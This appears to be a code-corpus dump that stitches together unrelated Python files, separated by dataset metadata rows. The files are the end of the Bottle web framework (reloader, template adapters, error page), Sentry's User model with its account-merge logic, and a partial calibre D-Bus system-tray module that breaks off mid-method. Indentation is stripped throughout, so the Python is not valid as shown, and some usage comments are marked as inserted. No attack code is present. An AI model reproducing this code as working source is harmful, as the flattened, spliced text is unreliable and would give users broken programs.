bgcheck = FileCheckerThread(lockfile, interval)
with bgcheck:
server.run(app)
if bgcheck.status == 'reload':
sys.exit(3)
else:
server.run(app)
except KeyboardInterrupt:
pass
except (SystemExit, MemoryError):
raise
except:
if not reloader: raise
if not getattr(server, 'quiet', quiet):
print_exc()
time.sleep(interval)
sys.exit(3)
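# Usage sketch (added for illustration, not part of the original source): common
# ways to start a server with run(); 'myapp:app' refers to a hypothetical module.
#
#     run(host='0.0.0.0', port=8080, debug=True)  # default app on wsgiref
#     run(server='waitress', port=8080)           # alternative server adapter
#     run('myapp:app', reloader=True)             # load the app from a target string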
class FileCheckerThread(threading.Thread):
""" Interrupt main-thread as soon as a changed module file is detected,
the lockfile gets deleted or gets to old. """
def __init__(self, lockfile, interval):
threading.Thread.__init__(self)
self.daemon = True
self.lockfile, self.interval = lockfile, interval
#: Is one of 'reload', 'error' or 'exit'
self.status = None
def run(self):
exists = os.path.exists
mtime = lambda p: os.stat(p).st_mtime
files = dict()
for module in list(sys.modules.values()):
path = getattr(module, '__file__', '')
if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
if path and exists(path): files[path] = mtime(path)
while not self.status:
if not exists(self.lockfile)\
or mtime(self.lockfile) < time.time() - self.interval - 5:
self.status = 'error'
thread.interrupt_main()
for path, lmtime in list(files.items()):
if not exists(path) or mtime(path) > lmtime:
self.status = 'reload'
thread.interrupt_main()
break
time.sleep(self.interval)
def __enter__(self):
self.start()
def __exit__(self, exc_type, *_):
if not self.status: self.status = 'exit' # silent exit
self.join()
return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
def __init__(self, message):
HTTPError.__init__(self, 500, message)
class BaseTemplate(object):
""" Base class and minimal API for template adapters """
extensions = ['tpl','html','thtml','stpl']
settings = {} #used in prepare()
defaults = {} #used in render()
def __init__(self, source=None, name=None, lookup=None, encoding='utf8', **settings):
""" Create a new template.
If the source parameter (str or buffer) is missing, the name argument
is used to guess a template filename. Subclasses can assume that
self.source and/or self.filename are set. Both are strings.
The lookup, encoding and settings parameters are stored as instance
variables.
The lookup parameter stores a list containing directory paths.
The encoding parameter should be used to decode byte strings or files.
The settings parameter contains a dict for engine-specific settings.
"""
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = [os.path.abspath(x) for x in lookup] if lookup else []
self.encoding = encoding
self.settings = self.settings.copy() # Copy from class variable
self.settings.update(settings) # Apply
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=None):
""" Search name in all directories specified in lookup.
First without, then with common extensions. Return first hit. """
if not lookup:
depr('The template lookup path list should not be empty.', True) #0.12
lookup = ['.']
if os.path.isabs(name) and os.path.isfile(name):
depr('Absolute template path names are deprecated.', True) #0.12
return os.path.abspath(name)
for spath in lookup:
spath = os.path.abspath(spath) + os.sep
fname = os.path.abspath(os.path.join(spath, name))
if not fname.startswith(spath): continue
if os.path.isfile(fname): return fname
for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
""" This reads or sets the global settings stored in class.settings. """
if args:
cls.settings = cls.settings.copy() # Make settings local to class
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
""" Run preparations (parsing, caching, ...).
It should be possible to call this again to refresh a template or to
update settings.
"""
raise NotImplementedError
def render(self, *args, **kwargs):
""" Render the template with the specified local variables and return
a single byte or unicode string. If it is a byte string, the encoding
must match self.encoding. This method must be thread-safe!
Local variables may be provided in dictionaries (args)
or directly, as keywords (kwargs).
"""
raise NotImplementedError
class MakoTemplate(BaseTemplate):
def prepare(self, **options):
from mako.template import Template
from mako.lookup import TemplateLookup
options.update({'input_encoding':self.encoding})
options.setdefault('format_exceptions', bool(DEBUG))
lookup = TemplateLookup(directories=self.lookup, **options)
if self.source:
self.tpl = Template(self.source, lookup=lookup, **options)
else:
self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
class CheetahTemplate(BaseTemplate):
def prepare(self, **options):
from Cheetah.Template import Template
self.context = threading.local()
self.context.vars = {}
options['searchList'] = [self.context.vars]
if self.source:
self.tpl = Template(source=self.source, **options)
else:
self.tpl = Template(file=self.filename, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
self.context.vars.update(self.defaults)
self.context.vars.update(kwargs)
out = str(self.tpl)
self.context.vars.clear()
return out
class Jinja2Template(BaseTemplate):
def prepare(self, filters=None, tests=None, globals={}, **kwargs):
from jinja2 import Environment, FunctionLoader
self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
if filters: self.env.filters.update(filters)
if tests: self.env.tests.update(tests)
if globals: self.env.globals.update(globals)
if self.source:
self.tpl = self.env.from_string(self.source)
else:
self.tpl = self.env.get_template(self.filename)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
def loader(self, name):
fname = self.search(name, self.lookup)
if not fname: return
with open(fname, "rb") as f:
return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
self.cache = {}
enc = self.encoding
self._str = lambda x: touni(x, enc)
self._escape = lambda x: escape_func(touni(x, enc))
self.syntax = syntax
if noescape:
self._str, self._escape = self._escape, self._str
@cached_property
def co(self):
return compile(self.code, self.filename or '<string>', 'exec')
@cached_property
def code(self):
source = self.source
if not source:
with open(self.filename, 'rb') as f:
source = f.read()
try:
source, encoding = touni(source), 'utf8'
except UnicodeError:
depr('Template encodings other than utf8 are no longer supported.') #0.11
source, encoding = touni(source, 'latin1'), 'latin1'
parser = StplParser(source, encoding=encoding, syntax=self.syntax)
code = parser.translate()
self.encoding = parser.encoding
return code
def _rebase(self, _env, _name=None, **kwargs):
_env['_rebase'] = (_name, kwargs)
def _include(self, _env, _name=None, **kwargs):
env = _env.copy()
env.update(kwargs)
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(env['_stdout'], env)
def execute(self, _stdout, kwargs):
env = self.defaults.copy()
env.update(kwargs)
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'include': functools.partial(self._include, env),
'rebase': functools.partial(self._rebase, env), '_rebase': None,
'_str': self._str, '_escape': self._escape, 'get': env.get,
'setdefault': env.setdefault, 'defined': env.__contains__ })
eval(self.co, env)
if env.get('_rebase'):
subtpl, rargs = env.pop('_rebase')
rargs['base'] = ''.join(_stdout) #copy stdout
del _stdout[:] # clear stdout
return self._include(env, subtpl, **rargs)
return env
def render(self, *args, **kwargs):
""" Render the template using keyword arguments as local variables. """
env = {}; stdout = []
for dictarg in args: env.update(dictarg)
env.update(kwargs)
self.execute(stdout, env)
return ''.join(stdout)
class StplSyntaxError(TemplateError): pass
class StplParser(object):
""" Parser for stpl templates. """
_re_cache = {} #: Cache for compiled re patterns
# This huge pile of voodoo magic splits python code into 8 different tokens.
# 1: All kinds of python strings (trust me, it works)
_re_tok = '((?m)[urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
'|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
'|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
'|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
_re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
# 2: Comments (until end of line, but not the newline itself)
_re_tok += '|(#.*)'
# 3,4: Keywords that start or continue a python block (only start of line)
_re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
'|^([ \\t]*(?:elif|else|except|finally)\\b)'
# 5: Our special 'end' keyword (but only if it stands alone)
_re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
# 6: A customizable end-of-code-block template token (only end of line)
_re_tok += '|(%(block_close)s[ \\t]*(?=$))'
# 7: And finally, a single newline. The 8th token is 'everything else'
_re_tok += '|(\\r?\\n)'
# Match the start tokens of code areas in a template
_re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))'
# Match inline statements (may contain python strings)
_re_inl = '%%(inline_start)s((?:%s|[^\'"\n]+?)*?)%%(inline_end)s' % _re_inl
default_syntax = '<% %> % {{ }}'
def __init__(self, source, syntax=None, encoding='utf8'):
self.source, self.encoding = touni(source, encoding), encoding
self.set_syntax(syntax or self.default_syntax)
self.code_buffer, self.text_buffer = [], []
self.lineno, self.offset = 1, 0
self.indent, self.indent_mod = 0, 0
def get_syntax(self):
""" Tokens as a space separated string (default: <% %> % {{ }}) """
return self._syntax
def set_syntax(self, syntax):
self._syntax = syntax
self._tokens = syntax.split()
if not syntax in self._re_cache:
names = 'block_start block_close line_start inline_start inline_end'
etokens = map(re.escape, self._tokens)
pattern_vars = dict(zip(names.split(), etokens))
patterns = (self._re_split, self._re_tok, self._re_inl)
patterns = [re.compile(p%pattern_vars) for p in patterns]
self._re_cache[syntax] = patterns
self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
syntax = property(get_syntax, set_syntax)
def translate(self):
if self.offset: raise RuntimeError('Parser is a one time instance.')
while True:
m = self.re_split.search(self.source[self.offset:])
if m:
text = self.source[self.offset:self.offset+m.start()]
self.text_buffer.append(text)
offs = self.offset
self.offset += m.end()
if m.group(1): # Escape syntax
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(self.source[offs+m.start():offs+m.start(1)]+m.group(2)+line+sep)
self.offset += len(line+sep)
continue
self.flush_text()
self.read_code(multiline=bool(m.group(4)))
else: break
self.text_buffer.append(self.source[self.offset:])
self.flush_text()
return ''.join(self.code_buffer)
def read_code(self, multiline):
code_line, comment = '', ''
while True:
m = self.re_tok.search(self.source[self.offset:])
if not m:
code_line += self.source[self.offset:]
self.offset = len(self.source)
self.write_code(code_line.strip(), comment)
return
code_line += self.source[self.offset:self.offset+m.start()]
self.offset += m.end()
_str, _com, _blk1, _blk2, _end, _cend, _nl = m.groups()
if code_line and (_blk1 or _blk2): # a if b else c
code_line += _blk1 or _blk2
continue
if _str: # Python string
code_line += _str
elif _com: # Python comment (up to EOL)
comment = _com
if multiline and _com.strip().endswith(self._tokens[1]):
multiline = False # Allow end-of-block in comments
elif _blk1: # Start-block keyword (if/for/while/def/try/...)
code_line, self.indent_mod = _blk1, -1
self.indent += 1
elif _blk2: # Continue-block keyword (else/elif/except/...)
code_line, self.indent_mod = _blk2, -1
elif _end: # The non-standard 'end'-keyword (ends a block)
self.indent -= 1
elif _cend: # The end-code-block template token (usually '%>')
if multiline: multiline = False
else: code_line += _cend
else: # \n
self.write_code(code_line.strip(), comment)
self.lineno += 1
code_line, comment, self.indent_mod = '', '', 0
if not multiline:
break
def flush_text(self):
text = ''.join(self.text_buffer)
del self.text_buffer[:]
if not text: return
parts, pos, nl = [], 0, '\\\n'+' '*self.indent
for m in self.re_inl.finditer(text):
prefix, pos = text[pos:m.start()], m.end()
if prefix:
parts.append(nl.join(map(repr, prefix.splitlines(True))))
if prefix.endswith('\n'): parts[-1] += nl
parts.append(self.process_inline(m.group(1).strip()))
if pos < len(text):
prefix = text[pos:]
lines = prefix.splitlines(True)
if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4]
parts.append(nl.join(map(repr, lines)))
code = '_printlist((%s,))' % ', '.join(parts)
self.lineno += code.count('\n')+1
self.write_code(code)
@staticmethod
def process_inline(chunk):
if chunk[0] == '!': return '_str(%s)' % chunk[1:]
return '_escape(%s)' % chunk
def write_code(self, line, comment=''):
code = ' ' * (self.indent+self.indent_mod)
code += line.lstrip() + comment + '\n'
self.code_buffer.append(code)
def template(*args, **kwargs):
"""
    Get a rendered template as a string.
You can use a name, a filename or a template string as first parameter.
Template rendering arguments can be passed as dictionaries
or directly (as keyword arguments).
"""
tpl = args[0] if args else None
adapter = kwargs.pop('template_adapter', SimpleTemplate)
lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
tplid = (id(lookup), tpl)
if tplid not in TEMPLATES or DEBUG:
settings = kwargs.pop('template_settings', {})
if isinstance(tpl, adapter):
TEMPLATES[tplid] = tpl
if settings: TEMPLATES[tplid].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tplid]:
abort(500, 'Template (%s) not found' % tpl)
for dictarg in args[1:]: kwargs.update(dictarg)
return TEMPLATES[tplid].render(kwargs)
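# Usage sketch (added for illustration, not part of the original source):
# template() accepts an inline template string or a name resolved against
# TEMPLATE_PATH; 'hello_template' is a placeholder template file.
#
#     template('Hello {{name}}!', name='World')  # -> 'Hello World!'
#     template('hello_template', name='World')   # e.g. ./views/hello_template.tpl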
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
""" Decorator: renders a template for a handler.
        The handler can control its behavior like this:
- return a dict of template vars to fill out the template
- return something other than a dict and the view decorator will not
process the template, but return the handler result as is.
This includes returning a HTTPResponse(dict) to get,
for instance, JSON with autojson or other castfilters.
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, (dict, DictMixin)):
tplvars = defaults.copy()
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return result
return wrapper
return decorator
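# Usage sketch (added for illustration, not part of the original source):
# combining @view with a route; 'item_list' is a hypothetical template name.
#
#     @route('/items')
#     @view('item_list')
#     def list_items():
#         return {'items': ['a', 'b', 'c']}  # the dict fills the template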
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/']
TEMPLATES = {}
DEBUG = False
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, request
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans-serif;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
if __name__ == '__main__':
opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
if opt.version:
_stdout('Bottle %s\n'%__version__)
sys.exit(0)
if not args:
parser.print_help()
_stderr('\nError: No application entry point specified.\n')
sys.exit(1)
sys.path.insert(0, '.')
sys.modules.setdefault('bottle', sys.modules['__main__'])
host, port = (opt.bind or 'localhost'), 8080
if ':' in host and host.rfind(']') < host.rfind(':'):
host, port = host.rsplit(':', 1)
host = host.strip('[]')
run(args[0], host=host, port=int(port), server=opt.server,
reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END | mit | -874,936,976,201,851,400 | 38.50483 | 108 | 0.566328 | false |
ifduyue/sentry | src/sentry/models/user.py | 1 | 10584 | """
sentry.models.user
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import logging
import warnings
from bitfield import BitField
from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.core.urlresolvers import reverse
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from sentry.db.models import BaseManager, BaseModel, BoundedAutoField
from sentry.models import LostPasswordHash
from sentry.utils.http import absolute_uri
audit_logger = logging.getLogger('sentry.audit.user')
class UserManager(BaseManager, UserManager):
pass
class User(BaseModel, AbstractBaseUser):
__core__ = True
id = BoundedAutoField(primary_key=True)
username = models.CharField(_('username'), max_length=128, unique=True)
# this column is called first_name for legacy reasons, but it is the entire
# display name
name = models.CharField(_('name'), max_length=200, blank=True, db_column='first_name')
email = models.EmailField(_('email address'), blank=True)
is_staff = models.BooleanField(
_('staff status'),
default=False,
help_text=_('Designates whether the user can log into this admin '
'site.')
)
is_active = models.BooleanField(
_('active'),
default=True,
help_text=_(
'Designates whether this user should be treated as '
'active. Unselect this instead of deleting accounts.'
)
)
is_superuser = models.BooleanField(
_('superuser status'),
default=False,
help_text=_(
'Designates that this user has all permissions without '
'explicitly assigning them.'
)
)
is_managed = models.BooleanField(
_('managed'),
default=False,
help_text=_(
'Designates whether this user should be treated as '
'managed. Select this to disallow the user from '
'modifying their account (username, password, etc).'
)
)
is_sentry_app = models.NullBooleanField(
_('is sentry app'),
null=True,
default=None,
help_text=_(
            'Designates whether this user is the entity used for Permissions '
            'on behalf of a Sentry App. Cannot login or use Sentry like a '
'normal User would.'
)
)
is_password_expired = models.BooleanField(
_('password expired'),
default=False,
help_text=_(
'If set to true then the user needs to change the '
'password on next sign in.'
)
)
last_password_change = models.DateTimeField(
_('date of last password change'),
null=True,
help_text=_('The date the password was changed last.')
)
flags = BitField(
flags=(
(
'newsletter_consent_prompt',
'Do we need to ask this user for newsletter consent?'
),
),
default=0,
null=True,
)
session_nonce = models.CharField(max_length=12, null=True)
date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
last_active = models.DateTimeField(_('last active'), default=timezone.now, null=True)
objects = UserManager(cache_fields=['pk'])
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
class Meta:
app_label = 'sentry'
db_table = 'auth_user'
verbose_name = _('user')
verbose_name_plural = _('users')
def delete(self):
if self.username == 'sentry':
raise Exception('You cannot delete the "sentry" user as it is required by Sentry.')
avatar = self.avatar.first()
if avatar:
avatar.delete()
return super(User, self).delete()
def save(self, *args, **kwargs):
if not self.username:
self.username = self.email
return super(User, self).save(*args, **kwargs)
def has_perm(self, perm_name):
warnings.warn('User.has_perm is deprecated', DeprecationWarning)
return self.is_superuser
def has_module_perms(self, app_label):
warnings.warn('User.has_module_perms is deprecated', DeprecationWarning)
return self.is_superuser
def get_unverified_emails(self):
return self.emails.filter(is_verified=False)
def get_verified_emails(self):
return self.emails.filter(is_verified=True)
def has_unverified_emails(self):
return self.get_unverified_emails().exists()
def get_label(self):
return self.email or self.username or self.id
def get_display_name(self):
return self.name or self.email or self.username
def get_full_name(self):
return self.name
def get_short_name(self):
return self.username
def get_salutation_name(self):
name = self.name or self.username.split('@', 1)[0].split('.', 1)[0]
first_name = name.split(' ', 1)[0]
return first_name.capitalize()
def get_avatar_type(self):
avatar = self.avatar.first()
if avatar:
return avatar.get_avatar_type_display()
return 'letter_avatar'
def send_confirm_email_singular(self, email, is_new_user=False):
from sentry import options
from sentry.utils.email import MessageBuilder
if not email.hash_is_valid():
email.set_hash()
email.save()
context = {
'user':
self,
'url':
absolute_uri(
reverse('sentry-account-confirm-email', args=[self.id, email.validation_hash])
),
'confirm_email':
email.email,
'is_new_user':
is_new_user,
}
msg = MessageBuilder(
subject='%sConfirm Email' % (options.get('mail.subject-prefix'), ),
template='sentry/emails/confirm_email.txt',
html_template='sentry/emails/confirm_email.html',
type='user.confirm_email',
context=context,
)
msg.send_async([email.email])
def send_confirm_emails(self, is_new_user=False):
email_list = self.get_unverified_emails()
for email in email_list:
self.send_confirm_email_singular(email, is_new_user)
def merge_to(from_user, to_user):
# TODO: we could discover relations automatically and make this useful
from sentry import roles
from sentry.models import (
Activity, AuditLogEntry, AuthIdentity, Authenticator, GroupAssignee, GroupBookmark, GroupSeen,
GroupShare, GroupSubscription, OrganizationMember, OrganizationMemberTeam, UserAvatar,
UserEmail, UserOption,
)
audit_logger.info(
'user.merge', extra={
'from_user_id': from_user.id,
'to_user_id': to_user.id,
}
)
for obj in OrganizationMember.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
except IntegrityError:
pass
# identify the highest priority membership
to_member = OrganizationMember.objects.get(
organization=obj.organization_id,
user=to_user,
)
if roles.get(obj.role).priority > roles.get(to_member.role).priority:
to_member.update(role=obj.role)
for team in obj.teams.all():
try:
with transaction.atomic():
OrganizationMemberTeam.objects.create(
organizationmember=to_member,
team=team,
)
except IntegrityError:
pass
model_list = (
Authenticator, GroupAssignee, GroupBookmark, GroupSeen, GroupShare,
GroupSubscription, UserAvatar, UserEmail, UserOption,
)
for model in model_list:
for obj in model.objects.filter(user=from_user):
try:
with transaction.atomic():
obj.update(user=to_user)
except IntegrityError:
pass
Activity.objects.filter(
user=from_user,
).update(user=to_user)
AuditLogEntry.objects.filter(
actor=from_user,
).update(actor=to_user)
AuditLogEntry.objects.filter(
target_user=from_user,
).update(target_user=to_user)
# remove any duplicate identities that exist on the current user that
        # might conflict w/ the new user's existing SSO
AuthIdentity.objects.filter(
user=from_user,
auth_provider__organization__in=AuthIdentity.objects.filter(
user=to_user,
).values('auth_provider__organization')
).delete()
AuthIdentity.objects.filter(
user=from_user,
).update(user=to_user)
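    # Usage sketch (added for illustration, not part of the original source):
    # merge_to is called on the duplicate account with the surviving account as
    # the target, e.g. from a cleanup task; both accounts are assumed to exist.
    #
    #     duplicate = User.objects.get(username='old@example.com')
    #     primary = User.objects.get(username='new@example.com')
    #     duplicate.merge_to(primary)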
def set_password(self, raw_password):
super(User, self).set_password(raw_password)
self.last_password_change = timezone.now()
self.is_password_expired = False
def refresh_session_nonce(self, request=None):
from django.utils.crypto import get_random_string
self.session_nonce = get_random_string(12)
if request is not None:
request.session['_nonce'] = self.session_nonce
def get_orgs(self):
from sentry.models import (Organization, OrganizationMember, OrganizationStatus)
return Organization.objects.filter(
status=OrganizationStatus.VISIBLE,
id__in=OrganizationMember.objects.filter(
user=self,
).values('organization'),
)
def get_orgs_require_2fa(self):
from sentry.models import (Organization, OrganizationStatus)
return Organization.objects.filter(
flags=models.F('flags').bitor(Organization.flags.require_2fa),
status=OrganizationStatus.VISIBLE,
member_set__user=self,
)
def clear_lost_passwords(self):
LostPasswordHash.objects.filter(user=self).delete()
# HACK(dcramer): last_login needs nullable for Django 1.8
User._meta.get_field('last_login').null = True
| bsd-3-clause | 7,035,034,941,226,481,000 | 32.283019 | 106 | 0.595333 | false |
jelly/calibre | src/calibre/gui2/dbus_export/tray.py | 1 | 7237 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# Implement the StatusNotifierItem spec for creating a system tray icon in
# modern linux desktop environments. See
# http://www.notmart.org/misc/statusnotifieritem/index.html#introduction
# This is not an actual standard, but is apparently used by GNOME, KDE and
# Unity, which makes it necessary enough to implement.
import os
import dbus
from PyQt5.Qt import (
QApplication, QObject, pyqtSignal, Qt, QPoint, QRect, QMenu, QSystemTrayIcon)
from calibre.gui2.dbus_export.menu import DBusMenu
from calibre.gui2.dbus_export.utils import icon_cache
from calibre.utils.dbus_service import (
Object, method as dbus_method, BusName, dbus_property, signal as dbus_signal)
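# Counter used to give each StatusNotifierItem created in this process a
# distinct D-Bus bus name.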
_sni_count = 0
class StatusNotifierItem(QObject):
IFACE = 'org.kde.StatusNotifierItem'
activated = pyqtSignal(object)
show_menu = pyqtSignal(int, int)
def __init__(self, **kw):
global _sni_count
QObject.__init__(self, parent=kw.get('parent'))
self.context_menu = None
self.is_visible = True
self.tool_tip = ''
self._icon = QApplication.instance().windowIcon()
self.show_menu.connect(self._show_menu, type=Qt.QueuedConnection)
_sni_count += 1
kw['num'] = _sni_count
self.dbus_api = StatusNotifierItemAPI(self, **kw)
def _show_menu(self, x, y):
m = self.contextMenu()
if m is not None:
m.exec_(QPoint(x, y))
def isVisible(self):
return self.is_visible
def setVisible(self, visible):
if self.is_visible != visible:
self.is_visible = visible
self.dbus_api.NewStatus(self.dbus_api.Status)
def show(self):
self.setVisible(True)
def hide(self):
self.setVisible(False)
def toggle(self):
self.setVisible(not self.isVisible())
def contextMenu(self):
return self.context_menu
def setContextMenu(self, menu):
self.context_menu = menu
self.dbus_api.publish_new_menu()
def geometry(self):
return QRect()
def toolTip(self):
return self.tool_tip
def setToolTip(self, val):
self.tool_tip = val or ''
self.dbus_api.NewToolTip()
def setIcon(self, icon):
self._icon = icon
self.dbus_api.NewIcon()
def icon(self):
return self._icon
@classmethod
def supportsMessages(cls):
return False
def emit_activated(self):
self.activated.emit(QSystemTrayIcon.Trigger)
_status_item_menu_count = 0
class StatusNotifierItemAPI(Object):
'See http://www.notmart.org/misc/statusnotifieritem/statusnotifieritem.html'
IFACE = 'org.kde.StatusNotifierItem'
def __init__(self, notifier, **kw):
global _status_item_menu_count
self.notifier = notifier
bus = kw.get('bus')
if bus is None:
bus = kw['bus'] = dbus.SessionBus()
self.name = '%s-%s-%s' % (self.IFACE, os.getpid(), kw.get('num', 1))
self.dbus_name = BusName(self.name, bus=bus, do_not_queue=True)
self.app_id = kw.get('app_id') or QApplication.instance().applicationName() or 'unknown_application'
self.category = kw.get('category') or 'ApplicationStatus'
self.title = kw.get('title') or self.app_id
Object.__init__(self, bus, '/' + self.IFACE.split('.')[-1])
_status_item_menu_count += 1
self.dbus_menu = DBusMenu('/StatusItemMenu/%d' % _status_item_menu_count, bus=bus, parent=kw.get('parent'))
def publish_new_menu(self):
menu = self.notifier.contextMenu()
if menu is None:
menu = QMenu()
if len(menu.actions()) == 0:
menu.addAction(self.notifier.icon(), _('Show/hide %s') % self.title, self.notifier.emit_activated)
# The menu must have at least one entry, namely the show/hide entry.
# This is necessary as Canonical in their infinite wisdom decided to
# force all tray icons to show their popup menus when clicked.
self.dbus_menu.publish_new_menu(menu)
@dbus_property(IFACE, signature='s')
def IconName(self):
return icon_cache().name_for_icon(self.notifier.icon())
@dbus_property(IFACE, signature='s')
def IconThemePath(self):
return icon_cache().icon_theme_path
@dbus_property(IFACE, signature='a(iiay)')
def IconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def OverlayIconName(self):
return ''
@dbus_property(IFACE, signature='(sa(iiay)ss)')
def ToolTip(self):
# This is ignored on Unity, Canonical believes in user interfaces
        # that are so functionality-free that they don't need tooltips
return self.IconName, self.IconPixmap, self.Title, self.notifier.toolTip()
@dbus_property(IFACE, signature='a(iiay)')
def OverlayIconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def AttentionIconName(self):
return ''
@dbus_property(IFACE, signature='a(iiay)')
def AttentionIconPixmap(self):
return dbus.Array(signature='(iiay)')
@dbus_property(IFACE, signature='s')
def Category(self):
return self.category
@dbus_property(IFACE, signature='s')
def Id(self):
return self.app_id
@dbus_property(IFACE, signature='s')
def Title(self):
return self.title
@dbus_property(IFACE, signature='s')
def Status(self):
return 'Active' if self.notifier.isVisible() else 'Passive'
@dbus_property(IFACE, signature='o')
def Menu(self):
return dbus.ObjectPath(self.dbus_menu.object_path)
@dbus_property(IFACE, signature='i')
def WindowId(self):
return 0
@dbus_method(IFACE, in_signature='ii', out_signature='')
def ContextMenu(self, x, y):
self.notifier.show_menu.emit(x, y)
@dbus_method(IFACE, in_signature='ii', out_signature='')
def Activate(self, x, y):
self.notifier.activated.emit(QSystemTrayIcon.Trigger)
@dbus_method(IFACE, in_signature='u', out_signature='')
def XAyatanaSecondaryActivate(self, timestamp):
# This is called when the user middle clicks the icon in Unity
